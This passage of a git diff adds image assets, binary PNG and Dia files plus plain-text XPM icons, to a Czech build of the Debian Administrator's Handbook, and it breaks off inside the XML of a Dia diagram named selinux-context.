+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oooooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oooooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +$$$$$$+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +$$$$$$+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo                              oX ..... +$$$$$$+ ....",
+" XooooooooooooooooooooooooooooooooX ..... ++++++++ ....",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .....          ....",
+"                                    ..... oooooooo ....",
+"... % % % % % % % % % % % % % % %........ oooooooo ....",
+"... % % % % % % % % % % % % % % %........          ....",
+"......&&%%%%%%%%%%%%%%%%%%%%&&............        .....",
+"......&&&&&%%%%%%%%%%%%%%&&&&&.........................",
+"                                     ......   .........",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .  ... ... ........",
+" Xo+++++++++++++++++++oooXXXXXooooX ...   .       .....",
+" Xoo+++++++++++++++++++ooXXoXX+++oX ....... X X X .....",
+" Xoooo+++++++++++++++ooooXoooX+++oX ....... X X X .....",
+" X$$$$$$$$$$$$$$$$$$$$$$$X$$$X$$$$X .......       .....",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ....... XXXXX .....",
+" oooooooooooooooooooooooooooooooooo ....... XXXXX .....",
+"                                    .......       ....."};
+
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/case-study.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/case-study.dia
new file mode 100644
index 000000000..9e65a8775
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/case-study.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/case-study.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/case-study.png
new file mode 100644
index 000000000..8d1e14b2d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/case-study.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-advanced-administration.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-advanced-administration.png
new file mode 100644
index 000000000..392045bf9
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-advanced-administration.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-apt.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-apt.png
new file mode 100644
index 000000000..493eb5808
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-apt.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-basic-configuration.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-basic-configuration.png
new file mode 100644
index 000000000..7d48ab683
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-basic-configuration.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-case-study.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-case-study.png
new file mode 100644
index 000000000..379523300
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-case-study.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-conclusion.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-conclusion.png
new file mode 100644
index 000000000..8603f73ff
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-conclusion.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-debian-packaging.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-debian-packaging.png
new file mode 100644
index 000000000..830cb3b7a
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-debian-packaging.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-derivative-distributions.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-derivative-distributions.png
new file mode 100644
index 000000000..22051ec06
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-derivative-distributions.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-existing-setup.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-existing-setup.png
new file mode 100644
index 000000000..dd99621f1
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-existing-setup.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-installation.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-installation.png
new file mode 100644
index 000000000..16ab65980
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-installation.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-network-infrastructure.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-network-infrastructure.png
new file mode 100644
index 000000000..cb6775d3c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-network-infrastructure.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-network-services.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-network-services.png
new file mode 100644
index 000000000..c74c3df36
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-network-services.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-packaging-system.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-packaging-system.png
new file mode 100644
index 000000000..538474b86
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-packaging-system.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-security.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-security.png
new file mode 100644
index 000000000..43c2bb605
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-security.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-short-remedial-course.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-short-remedial-course.png
new file mode 100644
index 000000000..3293f610e
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-short-remedial-course.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-solving-problems.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-solving-problems.png
new file mode 100644
index 000000000..793045299
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-solving-problems.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-the-debian-project.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-the-debian-project.png
new file mode 100644
index 000000000..4b75ba44c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-the-debian-project.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-unix-services.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-unix-services.png
new file mode 100644
index 000000000..fe71ddc4b
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-unix-services.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-workstation.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-workstation.png
new file mode 100644
index 000000000..395f60de6
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/chap-workstation.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/cover.jpg b/publish/cs-CZ/Debian/9/html/debian-handbook/images/cover.jpg
new file mode 100644
index 000000000..63f98f34d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/cover.jpg differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/debian.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/debian.png
new file mode 100644
index 000000000..7acde5f1d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/debian.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/debian.xpm b/publish/cs-CZ/Debian/9/html/debian-handbook/images/debian.xpm
new file mode 100644
index 000000000..e65d6697b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/images/debian.xpm
@@ -0,0 +1,44 @@
+/* XPM */
+static char * debian_xpm[] = {
+"28 24 17 1",
+" 	c None",
+".	c #BE073B",
+"+	c #C43761",
+"@	c #D26486",
+"#	c #DC92A9",
+"$	c #E3AEBF",
+"%	c #E9BFCD",
+"&	c #EECFDA",
+"*	c #F4DEE5",
+"=	c #F6E6ED",
+"-	c #F7EDF1",
+";	c #C12855",
+">	c #C63E66",
+",	c #FEFEFE",
+"'	c #D37895",
+")	c #BE1C4A",
+"!	c #CB5276",
+",,,,,,,,,,,,,,,,,,,,,,,,,,,,",
+",,,,,,,,,,,%@!'#$-,,,,,,,,,,",
+",,,,,,,,,&>......)>$,,,,,,,,",
+",,,,,,,,#...!#$$#+..@,,,,,,,",
+",,,,,,,#..!%,,,,,,'..',,,,,,",
+",,,,,-=))#,,,,,,,,,'..%,,,,,",
+",,,,,-@.%,,,,,,,,,,-;+$,,,,,",
+",,,,,%.#,,,,,$@'$*,,'.&,,,,,",
+",,,,,'.*,,,,$#,,,-,,$.&,,,,,",
+",,,,,!!,,,,,',,,,,,,%.%,,,,,",
+",,,,,!',,,,*',,,,,-,$)=,,,,,",
+",,,,,!#,,,,*!,,,,&-,#!-,,,,,",
+",,,,,!#,,,,,+-,-*-,=)%,,,,,,",
+",,,,,@!,,,,*#!-,,,&+$,,,,,,,",
+",,,,,#;,,,,,&'+'#!>%,,,,,,,,",
+",,,,,&.',,,,,-$##*,,,,,,,,,,",
+",,,,,,>.*,,,,,,,,,,,,,,,,,,,",
+",,,,,,%.#,,,,,,,,,,,,,,,,,,,",
+",,,,,,,@;-,,,,,,,,,,,,,,,,,,",
+",,,,,,,-+!,,,,,,,,,,,,,,,,,,",
+",,,,,,,,-+!-,,,,,,,,,,,,,,,,",
+",,,,,,,,,-'!%,,,,,,,,,,,,,,,",
+",,,,,,,,,,,&'$%,,,,,,,,,,,,,",
+",,,,,,,,,,,,,,,,,,,,,,,,,,,,"};
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/developers-map.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/developers-map.png
new file mode 100644
index 000000000..7185c7bd2
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/developers-map.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/evolution.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/evolution.png
new file mode 100644
index 000000000..4ae92f887
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/evolution.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-1.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-1.dia
new file mode 100644
index 000000000..7854e568d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-1.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-1.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-1.png
new file mode 100644
index 000000000..838c92521
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-1.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-2.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-2.dia
new file mode 100644
index 000000000..4198a9ab7
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-2.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-2.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-2.png
new file mode 100644
index 000000000..8b44b206b
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-2.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-4.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-4.dia
new file mode 100644
index 000000000..1ff98b687
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-4.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-4.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-4.png
new file mode 100644
index 000000000..ae984be20
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/existing-setup-4.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/firefox.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/firefox.png
new file mode 100644
index 000000000..ef2cd5448
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/firefox.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/fwbuilder.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/fwbuilder.png
new file mode 100644
index 000000000..78207f1e6
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/fwbuilder.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome-mime-application-x-deb.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome-mime-application-x-deb.png
new file mode 100644
index 000000000..14b96768d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome-mime-application-x-deb.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome-packagekit.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome-packagekit.png
new file mode 100644
index 000000000..2ec096591
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome-packagekit.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome.png
new file mode 100644
index 000000000..e3e7b5d28
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/gnome.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-autopartman-mode.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-autopartman-mode.png
new file mode 100644
index 000000000..8788e2c87
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-autopartman-mode.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-basesystem.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-basesystem.png
new file mode 100644
index 000000000..014d710e2
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-basesystem.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-boot.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-boot.png
new file mode 100644
index 000000000..3b922b4b7
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-boot.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-country-txt.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-country-txt.png
new file mode 100644
index 000000000..8cb6ad679
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-country-txt.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-country.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-country.png
new file mode 100644
index 000000000..6bb0bdc4f
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-country.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-gdm.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-gdm.png
new file mode 100644
index 000000000..98b7e2cf8
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-gdm.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-keyboard-txt.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-keyboard-txt.png
new file mode 100644
index 000000000..0ac1950aa
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-keyboard-txt.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-keyboard.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-keyboard.png
new file mode 100644
index 000000000..1f922e3d9
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-keyboard.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-lang-txt.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-lang-txt.png
new file mode 100644
index 000000000..12d0b4694
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-lang-txt.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-lang.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-lang.png
new file mode 100644
index 000000000..8c67ffd00
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-lang.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-mirror.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-mirror.png
new file mode 100644
index 000000000..d39450079
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-mirror.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman-disk.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman-disk.png
new file mode 100644
index 000000000..2faa8d909
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman-disk.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman-validation.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman-validation.png
new file mode 100644
index 000000000..e920eb871
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman-validation.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman.png
new file mode 100644
index 000000000..94bb1096c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-partman.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-rootpw.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-rootpw.png
new file mode 100644
index 000000000..06c86d8f1
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-rootpw.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-tasksel.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-tasksel.png
new file mode 100644
index 000000000..9bbb0f763
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-tasksel.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-username.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-username.png
new file mode 100644
index 000000000..a350d2758
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/inst-username.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/kde.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/kde.png
new file mode 100644
index 000000000..ccf0c6a49
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/kde.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/kmail.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/kmail.png
new file mode 100644
index 000000000..27c816f0c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/kmail.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/mail-server.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/mail-server.dia
new file mode 100644
index 000000000..166141696
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/mail-server.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/mail-server.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/mail-server.png
new file mode 100644
index 000000000..d97ec10d8
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/mail-server.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/microsoft-windows-logo-2.gif b/publish/cs-CZ/Debian/9/html/debian-handbook/images/microsoft-windows-logo-2.gif
new file mode 100644
index 000000000..c0ccf4272
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/microsoft-windows-logo-2.gif differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/netfilter.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/netfilter.dia
new file mode 100644
index 000000000..8bd74c414
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/netfilter.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/netfilter.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/netfilter.png
new file mode 100644
index 000000000..e69ca9b05
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/netfilter.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/next.xpm b/publish/cs-CZ/Debian/9/html/debian-handbook/images/next.xpm
new file mode 100644
index 000000000..138389be5
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/images/next.xpm
@@ -0,0 +1,36 @@
+/* XPM */
+static char * next_xpm[] = {
+"28 24 9 1",
+" 	c #c3c3c3",
+".	c #828282",
+"X	c #000000",
+"o	c #ffff9e",
+"O	c #ffbe5d",
+"+	c #ffbe7d",
+"@	c #ff0000",
+"#	c #00ff00",
+"$	c #3c9e3c",
+"                .XXX        ",
+"             .XXXXXX.       ",
+"          .XXXXXoooXX       ",
+"       .XXXOXXXoXXoXX.      ",
+"    .XXXXXXXOXXoooXXXX      ",
+"    .X+OOXXXOXXoXXXoXX.     ",
+"    X.X+X+OOXOXXoooXXXX     ",
+"    X.XXOXXXOOOXXXXX@@@.    ",
+"    XX.X+XXXXX+XX@@@XXXX    ",
+"   .XX.XX+XXXXX#@XXX@XXX.   ",
+"   XXXX.X$#XXX#$XXXX@XXXX   ",
+"   XXXX.XX$#$$#XXXXXX@XXX.  ",
+"   XXXXX.XXXX#$#XXXXX@XXX.  ",
+"   XXXXX.XXXX#$X$#$XXXX.    ",
+"   .XXXXX.XX#$XXXXXX. .XX.  ",
+"    XXXXX.XX#XXXX. .XXXXX   ",
+"    .XXXXX.XXX. .XXXXXXXX   ",
+"     XXXXX.X..XXXXXXXXXXX   ",
+"     .XXXXX.XXXXXXXXXXXX.   ",
+"      XXXXX XXXXXXXXXXXX    ",
+"      .XXXX.XXXXXXXXXXXX    ",
+"       XXX.XXXXXXXXXX.      ",
+"       .XX XXXXXXX.         ",
+"        XX XXXX.            "};
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/openlogo-nd.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/openlogo-nd.png
new file mode 100644
index 000000000..989f050a7
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/openlogo-nd.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/package-lifecycle.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/package-lifecycle.dia
new file mode 100644
index 000000000..6352dffa6
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/package-lifecycle.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/package-lifecycle.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/package-lifecycle.png
new file mode 100644
index 000000000..c72229fe6
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/package-lifecycle.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/package.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/package.png
new file mode 100644
index 000000000..184e920c1
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/package.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/redhat.xpm b/publish/cs-CZ/Debian/9/html/debian-handbook/images/redhat.xpm
new file mode 100644
index 000000000..8a37a83da
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/images/redhat.xpm
@@ -0,0 +1,29 @@
+/* XPM */
+static char *redhat_xpm[] = {
+"28 24 2 1",
+" 	c #ff9ebe",
+".	c #ff0000",
+"                            ",
+"                            ",
+"       ...        ...       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+" ..    ..............    .. ",
+" ...   ..............   ... ",
+"  ........................  ",
+"   ......................   ",
+"     ..................     ",
+"        ............        ",
+"                            "};
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/release-cycle.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/release-cycle.dia
new file mode 100644
index 000000000..6d5a73936
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/release-cycle.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/release-cycle.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/release-cycle.png
new file mode 100644
index 000000000..7cf307a5e
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/release-cycle.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-context.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-context.dia
new file mode 100644
index 000000000..a93ef532a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/images/selinux-context.dia
@@ -0,0 +1,1006 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<dia:diagram xmlns:dia="http://www.lysator.liu.se/~alla/dia/">
+  <dia:diagramdata>
+    <dia:attribute name="background">
+      <dia:color val="#ffffff"/>
+    </dia:attribute>
+    <dia:attribute name="pagebreak">
+      <dia:color val="#000099"/>
+    </dia:attribute>
+    <dia:attribute name="paper">
+      <dia:composite type="paper">
+        <dia:attribute name="name">
+          <dia:string>#A4#</dia:string>
+        </dia:attribute>
+        <dia:attribute name="tmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="bmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="lmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="rmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="is_portrait">
+          <dia:boolean val="true"/>
+        </dia:attribute>
+        <dia:attribute name="scaling">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="fitto">
+          <dia:boolean val="false"/>
+        </dia:attribute>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="grid">
+      <dia:composite type="grid">
+        <dia:attribute name="width_x">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="width_y">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_x">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_y">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:composite type="color"/>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="color">
+      <dia:color val="#d8e5e5"/>
+    </dia:attribute>
+    <dia:attribute name="guides">
+      <dia:composite type="guides">
+        <dia:attribute name="hguides"/>
+        <dia:attribute name="vguides"/>
+      </dia:composite>
+    </dia:attribute>
+  </dia:diagramdata>
+  <dia:layer name="Arrière-plan" visible="true" active="true">
+    <dia:object type="Flowchart - Box" version="0" id="O0">
+      <dia:attribute name="obj_pos">
+        <dia:point val="5.3,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="5.25,3.015;7.75,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="5.3,3.065"/>
